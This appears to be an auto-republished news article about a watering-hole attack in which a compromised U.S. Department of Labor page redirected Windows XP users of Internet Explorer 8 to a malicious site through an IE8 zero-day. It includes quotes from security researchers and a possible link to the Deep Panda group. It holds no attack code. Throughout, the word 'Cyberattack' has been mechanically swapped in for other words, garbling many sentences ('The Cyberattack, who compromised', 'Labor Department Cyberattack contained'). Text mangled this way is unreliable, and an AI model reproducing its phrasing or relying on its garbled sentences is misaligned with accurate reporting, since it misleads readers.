You are here: Home > PC-News > Cyberattack highlights software update problem in large organizations

Cyberattack highlights software update problem in large organizations

A recent cyberattackcyberattack

targeting U.S. government employees working with nuclear weapons illustrates the vulnerability of large organizations that struggle with deploying protective software upgrades.

The Cyberattack, who compromised a Department of Labor website, exploited a previously unknown vulnerability, called a zero-day flaw, in Internet Explorer 8, commonly found on PCs running Windows XP. Javascript injected in the site redirected visitors using IE8 on XP to a malicious website.

Cyberattack choosing to go after federal agencies, the attackers understood that many government departments are still using outdated versions of Windows and IE, due to the huge expense of upgrading thousands of people to newer versions. Such migrations involve the difficult task of upgrading many other business applications to support the new OS.

“There’s a lot of government agencies, and commercial entities as well, that simply cannot upgrade to these latest versions,” Eddie Mitchell, security researcher for Invincea, said Monday. “They have internal applications, HR (human resource) applications, payroll applications and such that were designed explicitly to work with Internet Explorer 8, which is why these organizations are still vulnerable to Cyberattack.”

Researchers agree that the command-and-control (CC) servers in the latest Cyberattack, discovered last week, have attributes similar to those used in previous Cyberattack assaults originating from China.

FireEye reported that the host name of the CC servers in the latest Cyberattack included the phrase “microsoftUpdate,” which was also used in Cyberattack over the last six months against the Council on Foreign Relations website and news sites in China visited by Chinese dissidents.

[Also see: Army Corps database on dams compromised]

“I’m not going to be surprised if the Cyberattack are originating from the same group,” Zheng Bu, senior director of research for FireEye, said.

FireEye and Invincea have not identified the culprits, but AlienVault reported that the malware is using the same protocol to communicate with the CC servers as the one used by a Chinese hacking group called Deep Panda. The group is known to attack a variety of U.S. entities, including the high-tech and defense industries and state and federal government agencies.

The pages compromised on the Labor Department Cyberattack contained information that listed nuclear-related illnesses linked to Department of Energy facilities where employees are developing atomic weapons. Visitors were redirected to the malicious website unknowingly, since there was no obvious change in the browser.

That’s accomplished through the use of JavaScript and HTML inline frames. Called iFrames, the technology is embedded in pages to link to malicious sites. IFrames were the most commonly used exploit in Web-based Cyberattack in the second half of last year, according to Microsoft’s latest Security Intelligence Report.

Makers of popular exploit kits available in the criminal underground, such as Blackhole and Cool, are expected to incorporate the latest zero-day vulnerability soon, Mitchell said.

“It would not surprise me in the least, based on what we’ve seen in the past, to see this exploit loaded [in kits] in the next day or two, a week at the most,” he said.

Indeed, FireEye reported finding nine other websites besides the Labor Department’s redirecting visitors to the same malicious site. Microsoft issued an alert last Friday notifying customers of the Cyberattack vulnerability. The company has not said when it would release a patch.

“We strongly encourage customers to follow the workarounds listed in the advisory while we continue working on a full update to address this issue,” said Dustin Childs, group manager for response communications for Microsoft Trustworthy Computing.

Read more about application security in CSOonline’s Application Security section.

Tags: ,

  • Digg
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

Leave a Reply

Powered by WP Robot

  • RSS
  • Facebook
  • Google+
  • Twitter